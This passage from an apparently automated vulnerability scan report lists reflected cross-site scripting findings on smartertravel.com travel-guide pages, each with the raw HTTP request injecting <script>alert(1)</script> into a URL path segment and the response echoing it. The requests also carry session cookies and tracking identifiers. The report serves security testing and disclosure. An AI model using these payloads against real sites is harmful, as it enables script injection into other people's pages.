Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:37 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:37 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:54:37 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/chicago-travel-guide.htmlee59f<script>alert(1)</script>125d2de89c1</p>
...[SNIP]...

2.59. http://www.smartertravel.com/travel-guides/greensboro-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/greensboro-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 40fc1<script>alert(1)</script>e78f31829fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides40fc1<script>alert(1)</script>e78f31829fa/greensboro-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:56:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:41 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:56:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:56:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides40fc1<script>alert(1)</script>e78f31829fa/greensboro-travel-guide.html</p>
...[SNIP]...

2.60. http://www.smartertravel.com/travel-guides/greensboro-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/greensboro-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cc37<script>alert(1)</script>3225ac5a56a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/greensboro-travel-guide.html9cc37<script>alert(1)</script>3225ac5a56a HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:59:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:59:28 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:59:28 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:59:28 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/greensboro-travel-guide.html9cc37<script>alert(1)</script>3225ac5a56a</p>
...[SNIP]...

2.61. http://www.smartertravel.com/travel-guides/kansas-city-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/kansas-city-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 217e8<script>alert(1)</script>a9572f644f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides217e8<script>alert(1)</script>a9572f644f6/kansas-city-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:54:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:07 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:07 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:54:07 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides217e8<script>alert(1)</script>a9572f644f6/kansas-city-travel-guide.html</p>
...[SNIP]...

2.62. http://www.smartertravel.com/travel-guides/kansas-city-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/kansas-city-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2d6b<script>alert(1)</script>018069d1303 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/kansas-city-travel-guide.htmlf2d6b<script>alert(1)</script>018069d1303 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:57:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:57:17 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:57:17 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:57:17 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/kansas-city-travel-guide.htmlf2d6b<script>alert(1)</script>018069d1303</p>
...[SNIP]...

2.63. http://www.smartertravel.com/travel-guides/kissimmee-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/kissimmee-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df09d<script>alert(1)</script>f007df64304 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guidesdf09d<script>alert(1)</script>f007df64304/kissimmee-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:02:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:02:23 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:02:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:02:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guidesdf09d<script>alert(1)</script>f007df64304/kissimmee-travel-guide.html</p>
...[SNIP]...

2.64. http://www.smartertravel.com/travel-guides/kissimmee-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/kissimmee-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c11e2<script>alert(1)</script>cb5bf62d44a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/kissimmee-travel-guide.htmlc11e2<script>alert(1)</script>cb5bf62d44a HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:02:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:02:29 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:02:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:02:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/kissimmee-travel-guide.htmlc11e2<script>alert(1)</script>cb5bf62d44a</p>
...[SNIP]...

2.65. http://www.smartertravel.com/travel-guides/las-vegas-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/las-vegas-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e77<script>alert(1)</script>7500a22296f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides73e77<script>alert(1)</script>7500a22296f/las-vegas-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:23 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:52:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides73e77<script>alert(1)</script>7500a22296f/las-vegas-travel-guide.html</p>
...[SNIP]...

2.66. http://www.smartertravel.com/travel-guides/las-vegas-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/las-vegas-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1295<script>alert(1)</script>4ced6e3615c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/las-vegas-travel-guide.htmla1295<script>alert(1)</script>4ced6e3615c HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:56 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:56 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:52:56 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/las-vegas-travel-guide.htmla1295<script>alert(1)</script>4ced6e3615c</p>
...[SNIP]...

2.67. http://www.smartertravel.com/travel-guides/lexington-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/lexington-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a096c<script>alert(1)</script>90f590f9443 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guidesa096c<script>alert(1)</script>90f590f9443/lexington-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:07:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:07:04 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:07:04 GMT; path=/; domain=.smartertravel.com
